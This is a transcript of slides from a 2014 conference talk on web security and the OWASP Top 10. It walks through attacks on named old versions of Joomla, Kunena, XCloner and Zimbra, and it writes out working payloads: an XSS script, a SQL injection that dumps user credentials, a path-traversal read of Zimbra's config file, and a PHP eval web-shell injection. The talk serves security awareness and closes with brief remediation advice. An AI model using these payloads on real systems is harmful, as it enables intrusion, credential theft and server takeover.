the web you thought you knew
DESCRIPTION
This is a presentation given at the Africahackon 2014 conference in regard to web security with particular focus on OWASP top 10.TRANSCRIPT
![Page 1: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/1.jpg)
The Web you thought you The Web you thought you knewknew
By Munir Njiru and Ruth Macharia
![Page 2: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/2.jpg)
● Most people don't think its relevant , why? – you either can't comprehend someone
attacking you.'
– you have no idea about attacks
Web Security Please?Web Security Please?
![Page 3: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/3.jpg)
● Glad I got your attention.. ● There are guys that have tried to open
your eyes by creating awareness of this, they are OWASP (Open Web Application Security Project)
● They have ten categories for these attacks but I will not bore you with all that talk so get more info here: https://www.owasp.org/index.php/Top_10_2013-Top_10
OWASP top 10OWASP top 10
![Page 4: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/4.jpg)
The web can’t be covered in a day , Bear with this it’s a tip of the iceberg but relevant. If we could cover it You’d feel this:
Don’t be illusioned!!Don’t be illusioned!!
![Page 5: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/5.jpg)
Why should I care what could these breaches possibly do you ask?
Well you could lose your webutation You could lose cash You could have your secrets exposed And for admins you could involuntarily sign a power
sharing agreement, and we know you don't like that.
This list is not comprehensive if you are holding your breath keep holding it :)
So what’s the worst?So what’s the worst?
![Page 6: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/6.jpg)
You shall see the worst and jumbled stuff on screen when an attack is carried out but don’t panic when you see all the technical jargon on screen just look at the results from the jargon and the answer to what was happening shall
come.
DisclaimerDisclaimer
![Page 7: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/7.jpg)
Let us tell this as a story, you see how slowly people fit in the OWASP Top 10, maybe not everywhere but enough places to render you done for:
I made a Mistake How?I made a Mistake How?
![Page 8: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/8.jpg)
So the IT Manager had a proposition of giving a dynamic site with the technology of today and a robust mail server for communication. Here are his specifications :
Dynamic content management on a robust platform (Joomla)
Backup system based on XCloner
Forum Based on Kunena to enable interaction for staff and clients
Zimbra Server for Mail Handling
I made a Mistake How?I made a Mistake How?
![Page 9: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/9.jpg)
He missed however to check the security of the proposed system and the version information led to this sites demise.
Let me save you the headache of his version information- recon was spoken of well it got us this: - Joomla 1.5.15
- Xcloner 2.1
- Kunena 1.6.1
- Zimbra 8.0.2
I made a Mistake How?I made a Mistake How?
![Page 10: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/10.jpg)
Well this is the ability for an attacker to diss you using your browser.
It’s basically the ability to add code to what you see , and this code is not usually added in your best interest.
XSSXSS
![Page 11: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/11.jpg)
Payload=> <script>alert("I said it was just an XSS what's the worst that could happen? \n Then the hackers at Africahackon went straight for my cookie jar and found all my secrets: \n\n" );</script>
Your Browser Dissed You!Your Browser Dissed You!
![Page 12: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/12.jpg)
DemoDemo
Your Browser Dissed You!Your Browser Dissed You!
![Page 13: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/13.jpg)
First of all you don’t need to go through a medicine class to get this.
In layman what it is the ability to sweet talk your
database so that it can give it up !!!
SQL InjectionSQL Injection
![Page 14: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/14.jpg)
Payload => %' and 1=2) union select 1, concat(0x3a,username,0x3a,email,0x3a,0x3a,activation),concat(0x3a,username,0x3a,email,0x3a,password,0x3a,activation),'Super Administrator','email','2009-11-26 22:09:28','2009-11-26 22:09:28',62,1,1,0,0,0,1,15 from jos_users-- ;
I just saw my Name!!!!I just saw my Name!!!!
![Page 15: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/15.jpg)
DemoDemo
I just saw my Name!!!!I just saw my Name!!!!
![Page 16: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/16.jpg)
It's technically giving information to anyone ...
Payload=> task=info
Information DisclosureInformation Disclosure
![Page 17: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/17.jpg)
DemoDemo
Information DisclosureInformation Disclosure
![Page 18: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/18.jpg)
This is basically the ability to read files within the system..
If you are thinking big deal so what just chill you will be answered.
LFILFI
![Page 19: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/19.jpg)
Waiiittt the mail tooo???Waiiittt the mail tooo???
![Page 20: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/20.jpg)
Waiiittt the mail tooo???Waiiittt the mail tooo???
![Page 21: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/21.jpg)
Payload=> res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
Waiiittt the mail tooo???Waiiittt the mail tooo???
![Page 22: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/22.jpg)
DemoDemo
Waiiittt the mail tooo???Waiiittt the mail tooo???
![Page 23: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/23.jpg)
To see this manually done without the script check our video to get the gist of
the background:
http://www.youtube.com/watch?v=ahJLYT8CLow
See it in Action!!!!See it in Action!!!!
![Page 24: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/24.jpg)
Just when you thought we were done :D well you were warned , the web is wide but we will be winding up in a bit.
RCE - Its not "Regional Centers of Expertise", It's Remote Code Execution
RCERCE
![Page 25: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/25.jpg)
Payload=> ?task=step2&output_url_pref=';+}+?>+<?php+eval($_GET['africahackon']);+?>&output_path=../../../../
What Just Happened???What Just Happened???
![Page 26: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/26.jpg)
DemoDemo
What Just Happened???What Just Happened???
![Page 27: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/27.jpg)
● This would all have been avoided if: – Data was validated on the platform
– The technology was investigated before being implemented.
RemediationRemediation
![Page 28: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/28.jpg)
● Don't be ashamed to scratch your head after this; I would too its a lot of information.
QuestionsQuestions
![Page 29: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/29.jpg)
Contact UsContact Us
![Page 30: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/30.jpg)
THANK YOU